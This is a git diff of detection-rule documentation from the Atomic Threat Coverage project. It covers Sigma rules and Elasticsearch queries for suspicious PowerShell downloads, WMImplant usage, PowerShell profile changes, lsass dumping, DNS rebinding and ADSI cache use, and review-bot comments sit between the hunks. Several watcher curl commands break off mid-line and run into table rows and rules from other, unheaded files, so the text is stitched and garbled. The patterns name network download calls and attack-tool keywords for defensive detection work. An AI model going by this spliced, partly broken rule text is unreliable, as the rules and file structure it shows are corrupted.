diff --git a/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md b/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
index 1fcbaf1..f71b510 100644
--- a/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
+++ b/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
@@ -1,8 +1,8 @@
| Title | DN_0050_1102_audit_log_was_cleared |
|:-------------------|:------------------|
-| **Description** | This event generates every time Windows Security audit log was cleared |
+| **Description** | Event 1102 is created whenever the Security log is cleared, REGARDLESS of the status of the Audit System Events audit policy |
| **Logging Policy** |
|
-| **References** | - [https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)
|
+| **References** | - [https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)
- [https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102)
|
| **Platform** | Windows |
| **Type** | Windows Log |
| **Channel** | Security |
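Review bot: the **Logging Policy** cell (the row right under the new description) is still empty in this hunk even though the rewritten description now states that 1102 is written regardless of the Audit System Events setting; put exactly that in the Logging Policy cell (e.g. "No audit subcategory needs to be enabled; the event is always written when the Security log is cleared") so readers do not assume an audit policy is still a prerequisite for this Data Needed entry.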
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
index a013b38..0f0d8ad 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
@@ -26,15 +26,20 @@ tags:
- attack.t1086
author: Florian Roth
date: 2017/03/05
+modified: 2020/03/25
logsource:
product: windows
service: powershell
detection:
- keywords:
- Message:
- - '*System.Net.WebClient).DownloadString(*'
- - '*system.net.webclient).downloadfile(*'
- condition: keywords
+ downloadfile:
+ Message|contains|all:
+ - 'System.Net.WebClient'
+ - '.DownloadFile('
+ downloadstring:
+ Message|contains|all:
+ - 'System.Net.WebClient'
+ - '.DownloadString('
+ condition: downloadfile or downloadstring
falsepositives:
- PowerShell scripts that download content from the Internet
level: medium
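Review bot: the move from the two adjacency keywords to `Message|contains|all` widens the match, and the rule text does not say so. `'System.Net.WebClient'` and `'.DownloadFile('` now only have to appear somewhere in the same message, so the two-step form (`$wc = New-Object System.Net.WebClient` on one line, `$wc.DownloadFile(` later) is caught where the old `*System.Net.WebClient).DownloadString(*` pattern required the class and the method call to be adjacent. That is the right change, but neither `description` nor `falsepositives` records it; add a sentence to the description so the `modified: 2020/03/25` bump is explained, and check whether `level: medium` still fits now that indirect usage matches as well.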
@@ -48,42 +53,42 @@ level: medium
### es-qs
```
-Message.keyword:(*System.Net.WebClient\\).DownloadString\\(* OR *system.net.webclient\\).downloadfile\\(*)
+(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004) |
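Review bot: the regenerated es-qs query loses the lower-case variant that the old query carried (`*system.net.webclient\\).downloadfile\\(*`). `Message.keyword` is a keyword field, which Elasticsearch matches case-sensitively, so a script that writes `system.net.webclient` / `.downloadfile(` in lower case no longer hits on the ES backend even though the Sigma rule is meant to be case-insensitive. Either keep both casings as separate values in the rule, or have the backend target the analysed `Message` field rather than `Message.keyword` for this rule.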
+| **ATT&CK Technique** | This Detection Rule wasn't mapped to ATT&CK Technique yet |
+| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
+| **Trigger** | There is no documented Trigger for this Detection Rule yet |
+| **Severity Level** | high |
+| **False Positives** | - System administrator create Powershell profile manually
|
+| **Development Status** | experimental |
+| **References** | - [https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/](https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/)
|
+| **Author** | HieuTT35 |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Powershell Profile.ps1 Modification
+id: b5b78988-486d-4a80-b991-930eff3ff8bf
+status: experimental
+description: Detects a change in profile.ps1 of the Powershell profile
+references:
+ - https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
+author: HieuTT35
+date: 2019/10/24
+modified: 2020/04/03
+logsource:
+ product: windows
+ service: sysmon
+detection:
+ event:
+ EventID: 11
+ target1:
+ TargetFilename|contains|all:
+ - '\My Documents\PowerShell\'
+ - '\profile.ps1'
+ target2:
+ TargetFilename|contains|all:
+ - 'C:\Windows\System32\WindowsPowerShell\v1.0\'
+ - '\profile.ps1'
+ condition: event and (target1 or target2)
+falsepositives:
+ - System administrator create Powershell profile manually
+level: high
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(EventID:"11" AND TargetFilename.keyword:*\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\My\\ Documents\\\\PowerShell\\* OR TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b5b78988-486d-4a80-b991-930eff3ff8bf <[TA0002: Execution](https://attack.mitre.org/tactics/TA0002) |
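Review bot: `target1` in the new Powershell Profile.ps1 Modification rule looks for `'\My Documents\PowerShell\'`, but the per-user profile for Windows PowerShell lives under `...\Documents\WindowsPowerShell\profile.ps1` (PowerShell Core uses `...\Documents\PowerShell\profile.ps1`), and Sysmon normally reports the resolved `Documents` path rather than the `My Documents` junction name, so the per-user case will not match. Use `'\Documents\WindowsPowerShell\'` and `'\Documents\PowerShell\'` as two entries. Two smaller points: Event 11 is FileCreate, which Sysmon writes on create or overwrite and not on an in-place edit, so the title and `description` ("a change in profile.ps1") overstate what is covered; and `tags` carries only tactics (`attack.persistence`, `attack.privilege_escalation`) with no technique tag, which is why the **ATT&CK Technique** and **Trigger** rows render as unmapped.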
+| **ATT&CK Technique** | - [T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
|
+| **Data Needed** | - [DN_0036_4104_windows_powershell_script_block](../Data_Needed/DN_0036_4104_windows_powershell_script_block.md)
|
+| **Trigger** | - [T1047: Windows Management Instrumentation](../Triggers/T1047.md)
|
+| **Severity Level** | high |
+| **False Positives** | - Administrative scripts that use the same keywords.
|
+| **Development Status** | experimental |
+| **References** | - [https://github.com/FortyNorthSecurity/WMImplant](https://github.com/FortyNorthSecurity/WMImplant)
|
+| **Author** | NVISO |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: WMImplant Hack Tool
+id: 8028c2c3-e25a-46e3-827f-bbb5abf181d7
+status: experimental
+description: Detects parameters used by WMImplant
+references:
+ - https://github.com/FortyNorthSecurity/WMImplant
+tags:
+ - attack.execution
+ - attack.t1047
+author: NVISO
+date: 2020/03/26
+logsource:
+ product: windows
+ service: powershell
+ description: "Script block logging must be enabled"
+detection:
+ selection:
+ ScriptBlockText|contains:
+ - "WMImplant"
+ - " change_user "
+ - " gen_cli "
+ - " command_exec "
+ - " disable_wdigest "
+ - " disable_winrm "
+ - " enable_wdigest "
+ - " enable_winrm "
+ - " registry_mod "
+ - " remote_posh "
+ - " sched_job "
+ - " service_mod "
+ - " process_kill "
+ # - " process_start "
+ - " active_users "
+ - " basic_info "
+ # - " drive_list "
+ # - " installed_programs "
+ - " power_off "
+ - " vacant_system "
+ - " logon_events "
+ condition: selection
+falsepositives:
+ - Administrative scripts that use the same keywords.
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+ScriptBlockText.keyword:(*WMImplant* OR *\\ change_user\\ * OR *\\ gen_cli\\ * OR *\\ command_exec\\ * OR *\\ disable_wdigest\\ * OR *\\ disable_winrm\\ * OR *\\ enable_wdigest\\ * OR *\\ enable_winrm\\ * OR *\\ registry_mod\\ * OR *\\ remote_posh\\ * OR *\\ sched_job\\ * OR *\\ service_mod\\ * OR *\\ process_kill\\ * OR *\\ active_users\\ * OR *\\ basic_info\\ * OR *\\ power_off\\ * OR *\\ vacant_system\\ * OR *\\ logon_events\\ *)
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8028c2c3-e25a-46e3-827f-bbb5abf181d7 < kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain
routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
status: experimental
-date: 27/10/2019
+date: 2019/10/27
author: Perez Diego (@darkquassar), oscd.community
references:
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
index 22d8ec0..1a6ac7e 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
@@ -23,7 +23,7 @@ status: experimental
description: Detects the use of MiniDumpWriteDump API for dumping lsass.exe memory in a stealth way. Tools like ProcessHacker and some attacker tradecract use this
API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and
transfer it over the network back to the attacker's machine.
-date: 27/10/2019
+date: 2019/10/27
modified: 2019/11/13
author: Perez Diego (@darkquassar), oscd.community
references:
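Review bot: two spelling issues sit in the unchanged `description` context of this hunk: `tradecract` should be `tradecraft`, and the C2 framework named as `SilentTrynity` is spelt SILENTTRINITY by its project. Since the hunk already touches this block for the `date` format, fix both while here.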
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
index 46f593c..0fbc1ed 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
@@ -79,7 +79,7 @@ level: medium
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/eb07e747-2552-44cd-af36-b659ae0958e4 <100. (DNS-record will saved in host cache for a while TTL).",\n "tags": [\n "attack.command_and_control",\n "attack.t1043"\n ],\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR 
\\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR 
\\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ComputerName.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n },\n "aggs": {\n "agg": {\n "terms": {\n "field": "QueryName.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {\n "gt": 3\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Possible DNS Rebinding\'",\n "body": "Hits:\\n{{#aggregations.agg.buckets}}\\n {{key}} {{doc_count}}\\n\\n{{#by.buckets}}\\n-- {{key}} {{doc_count}}\\n{{/by.buckets}}\\n\\n{{/aggregations.agg.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/eb07e747-2552-44cd-af36-b659ae0958e4 <100. (DNS-record will saved in host cache for a while TTL).",\n "tags": [\n "attack.command_and_control",\n "attack.t1043"\n ],\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR 
\\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR 
\\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ComputerName",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n },\n "aggs": {\n "agg": {\n "terms": {\n "field": "QueryName",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {\n "gt": 3\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Possible DNS Rebinding\'",\n "body": "Hits:\\n{{#aggregations.agg.buckets}}\\n {{key}} {{doc_count}}\\n\\n{{#by.buckets}}\\n-- {{key}} {{doc_count}}\\n{{/by.buckets}}\\n\\n{{/aggregations.agg.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
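Review bot: the only change in this watcher is the aggregation fields going from `ComputerName.keyword` / `QueryName.keyword` to `ComputerName` / `QueryName` (the two `"terms"` blocks next to `"min_doc_count": 4`). A `terms` aggregation needs a keyword (doc-values) field; on the usual Winlogbeat-style mapping these are `text` fields with a `.keyword` sub-field, so the un-suffixed names will fail with a fielddata error and the watch will never fire. If the backend config deliberately maps these as keyword, say so in the commit message; otherwise revert to the `.keyword` form, which the `query_string` part of the same watch still uses for `QueryName.keyword`.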
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md
new file mode 100644
index 0000000..e697218
--- /dev/null
+++ b/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md
@@ -0,0 +1,99 @@
+| Title | Suspicious ADSI-Cache Usage By Unknown Tool |
+|:-------------------------|:------------------|
+| **Description** | detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger. |
+| **ATT&CK Tactic** | - [TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)
|
+| **ATT&CK Technique** | - [T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)
|
+| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
+| **Trigger** | - [T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)
|
+| **Severity Level** | high |
+| **False Positives** | - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
|
+| **Development Status** | experimental |
+| **References** | - [https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)
- [https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)
- [https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)
|
+| **Author** | xknow @xknow_infosec |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Suspicious ADSI-Cache Usage By Unknown Tool
+id: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb
+description: detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.
+status: experimental
+date: 2019/03/24
+author: xknow @xknow_infosec
+references:
+ - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
+ - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
+ - https://github.com/fox-it/LDAPFragger
+tags:
+ - attack.t1041
+ - attack.persistence
+logsource:
+ product: windows
+ service: sysmon
+detection:
+ selection_1:
+ EventID: 11
+ TargetFilename: '*\Local\Microsoft\Windows\SchCache\*.sch'
+ selection_2:
+ Image|contains:
+ - 'C:\windows\system32\svchost.exe'
+ - 'C:\windows\system32\dllhost.exe'
+ - 'C:\windows\system32\mmc.exe'
+ - 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe'
+ condition: selection_1 and not selection_2
+falsepositives:
+ - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
